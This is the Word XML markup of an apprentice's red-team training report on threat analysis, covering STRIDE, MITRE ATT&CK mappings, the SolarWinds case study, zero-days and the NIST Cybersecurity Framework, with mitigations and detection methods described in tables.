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80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">CYART RED TEAMING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">APPRENTICESHIP TRAINING PROGRAM</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4"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="4"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">WEEK 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Threat Analysis &amp; Incident Response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DEEAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Submitted by</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F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cybersecurity Apprentice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DEEAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Program</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F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CYART Red Teaming</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DEEAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Repository</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F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">github.com/[username]/cyart-red-teaming</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DEEAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Folder</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F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Week 2</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DEEAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Submission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F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Friday 4:30 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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60"/>
              <w:left w:type="dxa" w:w="300"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="300"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">All documentation, notes, screenshots, and workflow files are in the GitHub repository under the Week 2 folder.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300"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="300"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">PART A: THEORETICAL KNOWLEDGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Advanced Threat Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced threat analysis enables security professionals to model, identify, and understand sophisticated attacks before and after they occur. This section covers STRIDE threat modeling, the MITRE ATT&amp;CK Framework, and advanced attack vectors including APTs, supply chain attacks, and zero-day exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 STRIDE Threat Modeling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE, developed by Microsoft, categorizes threats into six types applied by mapping a system's assets, entry points, and trust boundaries. The table below defines each category with real-world examples.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2000"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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Threat Type</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Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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 — Spoofing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Identity Spoofing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Impersonating a legitimate user or system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Phishing email pretending to be IT support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MFA, digital certificates, HSTS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T — Tampering</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Data Tampering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Unauthorized modification of data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MITM attack altering API responses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TLS, HMAC, digital signatures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 — Repudiation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Repudiation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Denying having performed an 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Deleting records without audit trail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Immutable logging, audit trails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I — Info Disclosure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Information Disclosure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Exposing data to unauthorized parties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Error messages leaking DB schema</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Encryption, proper error handling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 — Denial of Service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DoS / DDoS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Disrupting availability of services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SYN flood crashing a web server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Rate limiting, CDN, redundancy</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E — Elevation of Privilege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Privilege Escalation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Gaining unauthorized higher access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SQL injection to get admin access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Least privilege, RBAC, input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Applying STRIDE to a Web Application (Authentication System)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using OWASP Threat Dragon, STRIDE was applied to a sample web application login system. The following table documents identified threats and mitigations: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200"/>
        <w:gridCol w:w="4460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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STRIDE</w:t>
            </w:r>
          </w:p>
        </w:tc>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Identified Threat</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44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Spoofing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Phishing page mimicking login portal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HIGH</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Implement MFA; HSTS headers; certificate pinning</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Tampering</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Session token manipulation via cookie editing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HIGH</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Signed JWT tokens; HTTPS only; SameSite cookies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Repudiation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No audit trail for failed login attempts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MEDIUM</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Log all auth events to centralized SIEM</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Info Disclosure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Verbose error messages revealing DB structure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MEDIUM</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Generic error messages in production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DoS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Brute force lockout bypassed with IP rotation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HIGH</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Rate limiting; CAPTCHA; distributed lockout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Elevation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SQL injection in login field granting admin access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CRITICAL</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Parameterized queries; WAF; input sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 MITRE ATT&amp;CK Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The MITRE ATT&amp;CK Framework is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is organized into 14 Tactics, each containing multiple Techniques.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2600"/>
        <w:gridCol w:w="38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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Tactic ID</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Key Techniques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Initial Access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TA0001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Methods to enter target network</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T1566 (Phishing), T1190 (Exploit Public App)</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Execution</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TA0002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Running malicious code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T1059 (Scripting), T1203 (Exploit for Execution)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Persistence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TA0003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Maintaining access across reboots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T1547 (Registry Run Keys), T1053 (Scheduled Tasks)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Privilege Escalation</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TA0004</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Gaining higher permissions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T1068 (Exploit for PrivEsc), T1548 (Bypass UAC)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Defense Evasion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TA0005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Avoiding detection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T1027 (Obfuscation), T1070 (Indicator Removal)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Credential Access</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TA0006</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Stealing account credentials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T1003 (OS Credential Dumping), T1110 (Brute Force)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Lateral Movement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TA0008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Moving through the network</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T1021 (Remote Services), T1550 (Use Alternate Creds)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Command &amp; Control</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TA0011</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Communicating with compromised systems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T1071 (Web Protocols), T1095 (Non-App Layer)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Exfiltration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TA0010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Stealing data out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T1041 (Exfil Over C2), T1048 (Exfil Alt Protocol)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Impact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TA0040</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Disrupting operations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T1486 (Data Encrypted for Impact), T1490 (No Recovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing Attack Mapped to MITRE ATT&amp;CK (T1566)</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300"/>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="1860"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Observable Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Detection Method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1 — Delivery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Spearphishing Link</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T1566.001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Phishing email with malicious URL sent to user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Email gateway logs, URL reputation scan</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2 — Execution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PowerShell</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T1059.001</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Encoded PowerShell payload runs in memory</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Sysmon Event ID 1, 4688 — process creation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3 — Persistence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Registry Run Keys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T1547.001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HKCU Run key added for auto-start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Sysmon Event ID 13 — registry modification</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4 — C2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Application Layer Protocol</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T1071.001</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HTTP/HTTPS beacon to attacker IP every 60s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Suricata IDS alert, Elastic SIEM correlation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5 — Exfiltration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Exfil Over C2 Channel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T1041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Data staged and sent over existing C2 HTTP</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Network traffic volume anomaly in SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Advanced Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Persistent Threats (APTs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">APTs are long-term, targeted campaigns often conducted by nation-state actors or sophisticated criminal groups. They operate quietly over weeks to years, prioritizing stealth over speed.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Characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Duration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Weeks to years — patient, methodical approach</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Target</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Specific organizations — government, defense, critical infrastructure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Goal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Espionage, IP theft, intelligence gathering, disruption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Stealth</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Low-and-slow to avoid detection; living-off-the-land techniques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Example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APT29 (Cozy Bear) — SVR-linked, responsible for SolarWinds breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain Attack — SolarWinds 2020 Case Study</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The SolarWinds attack is the most significant supply chain attack in history. Attackers compromised the SolarWinds Orion software build pipeline, injecting a backdoor (SUNBURST) into legitimate software updates distributed to over 18,000 organizations.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Attack Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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MITRE Technique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Initial Compromise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Attackers gained access to SolarWinds build environment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T1195.002 — Compromise Software Supply Chain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Backdoor Insertion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SUNBURST backdoor injected into Orion 2019.4 – 2020.2.1 updates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T1546 — Event Triggered Execution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Distribution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18,000+ organizations installed trojanized updates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T1195.002 — Supply Chain Compromise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Dormancy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Backdoor stayed dormant 12–14 days before activating</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T1497 — Virtualization/Sandbox Evasion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C2 Communication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SUNBURST used DNS for C2 communication to avoid detection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T1071.004 — DNS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Lateral Movement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Attackers moved to cloud environments via forged SAML tokens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T1550.001 — Use Alternate Auth Material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Detection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FireEye discovered breach while investigating suspicious MFA enrollment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N/A — Red team tool theft triggered discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-Day Exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day exploits target vulnerabilities unknown to the software vendor, meaning no patch exists. They are highly valued in offensive operations because traditional signature-based defenses cannot detect them.</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6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Definition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Vulnerability exploited before the vendor is aware or a patch exists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Detection Challenge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No signature exists; requires behavioral detection and anomaly analysis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Famous Example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EternalBlue (MS17-010) — used in WannaCry and NotPetya ransomware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Market</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Sold on dark web; nation-states maintain stockpiles (NSA NOBUS policy)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Defense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Behavioral EDR, patch speed, network segmentation, least privilege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Research Resources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Exploit-DB (exploit-db.com), NVD (nvd.nist.gov), CVE Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Security Frameworks In Depth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Security frameworks provide structured guidance for building, managing, and improving cybersecurity programs. This section covers the NIST Cybersecurity Framework (CSF) and ISO 27001, including real-world application to ransomware scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 NIST Cybersecurity Framework (CSF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The NIST CSF provides a policy framework organized into five core functions. It is widely adopted by US government agencies and private sector organizations.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2800"/>
        <w:gridCol w:w="4260"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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1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Color</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Core Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Key Subcategories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IDENTIFY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Blue — Foundation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Asset management, risk assessment, governance, supply chain risk</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ID.AM: Asset inventory; ID.RA: Risk assessment; ID.GV: Governance</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PROTECT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Green — Safeguards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Access control, encryption, training, maintenance, protective tech</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PR.AC: Access control; PR.DS: Data security; PR.AT: Awareness training</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DETECT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Yellow — Vigilance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Continuous monitoring, anomaly detection, security log analysis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DE.AE: Anomaly events; DE.CM: Security monitoring; DE.DP: Detection processes</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RESPOND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Orange — Action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IR planning, communications, analysis, mitigation, improvements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RS.RP: Response planning; RS.CO: Communications; RS.AN: Analysis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RECOVER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Purple — Restoration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Recovery planning, improvement, stakeholder communications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RC.RP: Recovery planning; RC.IM: Improvements; RC.CO: Communications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST CSF Implementation Tiers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3500"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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3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0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Indicators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Tier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Partial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Ad hoc, reactive security practices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No formal policy; risk managed informally</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Tier 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Risk-Informed</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Risk-aware but not organization-wide policy</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Some processes in place; not consistently applied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Tier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Repeatable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Formal, approved, consistently implemented policies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Organization-wide implementation; regular reviews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Tier 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Adaptive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Continuously improving based on lessons 